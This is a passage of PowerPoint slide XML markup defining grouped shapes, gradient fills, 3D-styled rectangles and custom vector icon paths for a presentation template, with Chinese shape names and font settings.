                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
